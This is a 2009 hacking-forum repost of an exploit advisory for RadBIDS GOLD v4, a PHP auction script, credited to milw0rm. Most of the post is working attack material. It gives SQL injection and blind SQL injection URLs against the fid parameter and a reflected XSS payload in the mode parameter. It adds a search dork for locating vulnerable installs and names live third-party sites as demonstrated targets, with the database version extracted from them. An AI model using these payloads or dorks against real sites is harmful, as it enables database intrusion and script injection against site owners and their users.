Multi Ethnic Hacking Group


    RadBIDS GOLD v4 Multiple Remote Vulnerabilities

    Share
    avatar
    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    RadBIDS GOLD v4 Multiple Remote Vulnerabilities

    Post by Foxi on Thu Jul 23, 2009 4:24 am

    Code:
    ###########################################################################
    #-----------------------------I AM MUSLIM !!------------------------------#
    ###########################################################################

    ==============================================================================
                          _      _      _          _      _  _
                        / \    | |    | |        / \    | | | |
                        / _ \  | |    | |      / _ \  | |_| |
                      / ___ \  | |___  | |___  / ___ \  |  _  |
      IN THE NAME OF /_/  \_\ |_____| |_____| /_/  \_\ |_| |_|
                                                               

    ==============================================================================
            [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
    ==============================================================================
            [»] RadBIDS GOLD v4 Multiple Remote Vulnerabilities
    ==============================================================================

       [»] script:            [ RadBIDS GOLD v4 ]
       [»] Language:          [ PHP ]
            [»] Download:          [ http://www.radscripts.com/auctionsoftware/ebay_style/index.html  ]
       [»] Founder:            [ Moudi <m0udi@9.cn> ]
            [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
            [»] Team:              [ EvilWay ]
            [»] Dork:              [ Powered by: RadBids Gold v4 ]
            [»] Price:              [ $199 ]
            [»] Site :              [ https://security-shell.ws/forum.php ]

    ###########################################################################

    ===[ Exploit + LIVE : SQL INJECTION vulnerability ]===   
       
    [»] http://www.site.com/patch/index.php?a=view_forum&fid=[SQL]   

    [»] http://www.radbids.com/auction_software/test/index.php?a=view_forum&fid=null+union+select+1,2,version(),4,5--&admin=0
    [»] http://havetosellitnow.com/index.php?a=view_forum&fid=null+union+select+1,2,version(),4,5--&admin=0
        RESULT : 5.0.67-community

    ===[ Exploit + LIVE : BLIND SQL vulnerability ]===

    [»] http://www.site.com/patch/index.php?a=view_forum&fid=[BLIND]

    [»] http://www.radbids.com/auction_software/test/index.php?a=view_forum&fid=1%20AND%20SUBSTRING(@@version,1,1)=5&admin=0 TRUE
        http://www.radbids.com/auction_software/test/index.php?a=view_forum&fid=1%20AND%20SUBSTRING(@@version,1,1)=4&admin=0 FALSE
        SO MYSQL: V5

    ===[ Exploit XSS + LIVE : vulnerability ]===

    [»] http://www.site.com/patch/storefront.php?user=104&mode=[XSS]

    [»] http://www.radbids.com/auction_software/test/storefront.php?user=104&mode=1>"><script %0A%0D>alert(528305396116)%3B</script>
    [»] http://www.getmebids.com/storefront.php?user=104&mode=1>"><script %0A%0D>alert(528305396116)%3B</script>


    Author: Moudi

    ###########################################################################

    # milw0rm.com [2009-07-17]


      Current date/time is Sat Sep 23, 2017 9:22 am